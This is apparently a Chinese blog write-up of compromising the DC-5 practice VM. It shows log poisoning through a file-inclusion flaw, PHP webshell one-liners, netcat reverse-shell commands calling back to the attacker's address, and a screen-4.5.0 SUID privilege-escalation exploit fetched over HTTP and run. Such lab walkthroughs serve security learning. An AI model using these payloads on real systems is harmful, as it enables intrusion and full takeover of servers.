一、信息收集
查询本机ip及目标靶机ip
老样子,本机ip:192.168.56.104,靶机ip通过nmap或arp-scan -l查看
![](https://img-blog.csdnimg.cn/img_convert/9a506dd2f4ec450fbe21afcdec9357b7.png)
靶机ip得知,然后进行信息收集
收集靶机开放端口
输入nmap -sS -sV -T5 -A 192.168.56.114
![](https://img-blog.csdnimg.cn/img_convert/90990702b3f34778a240fa2d012f2a1a.png)
这边有80和111端口,这个111端口存在rpcbind,网上搜到了该服务的漏洞,然后利用msf进行验证,确实存在,但是好像没啥作用(对渗透该靶机来说,可能是我太菜了,不会玩)注:rpcbind是一个RPC服务,主要是在nfs共享时候负责通知客户端,服务器的nfs端口号的。简单理解RPC就是一个中介服务。
![](https://img-blog.csdnimg.cn/img_convert/3b85c9b9153945d682df41d5d826f968.png)
对应端口进行尝试
打开浏览器,输入靶机ip地址,对其web服务进行信息收集
![](https://img-blog.csdnimg.cn/img_convert/cb948a189fb94b89bc3a587c506d8295.png)
查看源代码也没发现什么,爆破下目录
![](https://img-blog.csdnimg.cn/img_convert/3659dc882b374976974c1215aaab9142.png)
好像也没得什么东西,就是网站的构成,来回点点,发现在contact处有点不同
这边有输入框,本能的在想会不会有sql注入,后面验证,没得。然后,尝试的点提交发现
![](https://img-blog.csdnimg.cn/img_convert/19dc4f37da0548968e0ee80c3d39683b.png)
![](https://img-blog.csdnimg.cn/img_convert/446508a8c3f84d1fb365459c4da41410.png)
这里的日期怎么在不断地变化,为了验证是不是在变化,尝试多刷新几次,发现确实如此
![](https://img-blog.csdnimg.cn/img_convert/5341fc0eebf040ba9cc998dae9e77e8e.png)
根据之前目录爆出的footer.php,可能是会存在文件包含漏洞,关于该漏洞原理,可以去看之前的文章
https://blog.csdn.net/weixin_43938645/article/details/127615240?spm=1001.2014.3001.5502
二、Web渗透
直接上bp,对网页抓包,将包发到repeater模块,进行分析
![](https://img-blog.csdnimg.cn/img_convert/aa950cc4d8064c97ab0e5202dc67033a.png)
这个footer有点东西,那这之后就可以上传个一句话,用蚁剑连接一下,或者在kali中开启监听,直接在网页上输入命令,反弹shell
第一种方式:
通过前面的信息收集,该网站服务器是Nginx的,故它有自己固定位置的日志文件,可以向其中写入木马,然后通过蚁剑去连接
<?php eval($_REQUEST[xiaoli]); ?> #密码自己设置
![](https://img-blog.csdnimg.cn/img_convert/cdd45bc08ef546728bf4ee98a1919b6b.png)
用bp将包发送,然后打开蚁剑,输入网站日志文件的地址和连接的密码,即可连接成功
![](https://img-blog.csdnimg.cn/img_convert/36e688df8efb4a549bbebdc077be550c.png)
![](https://img-blog.csdnimg.cn/img_convert/f606a1cd40da43d1b8a81e749bdc8491.png)
然后右键,打开终端,输入nc -e /bin/bash 192.168.56.104 7777,同时在终端开启监听,即可获得一个shell
![](https://img-blog.csdnimg.cn/img_convert/e54e6b2316bb47a58fa3a338aeff0c7a.png)
![](https://img-blog.csdnimg.cn/img_convert/4f390df47f494162be12211b77cd189f.png)
第二种方式:
先用bp向日志文件写入一句话木马,然后通过日志文件执行命令,反弹shell
<?php system($_GET[xiaoli]); ?>
![](https://img-blog.csdnimg.cn/img_convert/d93cad9540c94718bb31040c2f9dae21.png)
http://192.168.56.114/thankyou.php?file=/var/log/nginx/access.log&xiaoli=nc 192.168.56.104 7777 -c /bin/bash
![](https://img-blog.csdnimg.cn/img_convert/078903f225d6438693f7fa858b5c1010.png)
![](https://img-blog.csdnimg.cn/img_convert/abf1087b321d41ac8425db06cba9463a.png)
这也获得了一个shell。
下一步就是进行提权,find / -perm -4000 2>/dev/null
查看下SUID提权
![](https://img-blog.csdnimg.cn/img_convert/2cab9c6ff1af484f91a1f4030c2b73d0.png)
发现了个screen-4.5.0,在本地查找下相关的漏洞,将其复制到项目录下
![](https://img-blog.csdnimg.cn/img_convert/5708c8a705eb4d60ad0344b8ff720c66.png)
在kali开启http服务,python -m http.server 8082
然后返回shell中,进入/tmp目录下,下载这个41154.sh,并赋予执行的权限,执行后,提权成功
![](https://img-blog.csdnimg.cn/img_convert/1b57dfd90c674ebc892d6a8d89f2d892.png)
最后进入root底下发现最终的flag文件
![](https://img-blog.csdnimg.cn/img_convert/75dc356a0e284aa08503f8527e0ac817.png)
如果在蚁剑中也很好整,将41154.sh上传到里面然后运行是一样的。
到此,DC系列的第5个靶机就结束了
每天进步一丢丢,渗透的感觉就有一丢丢~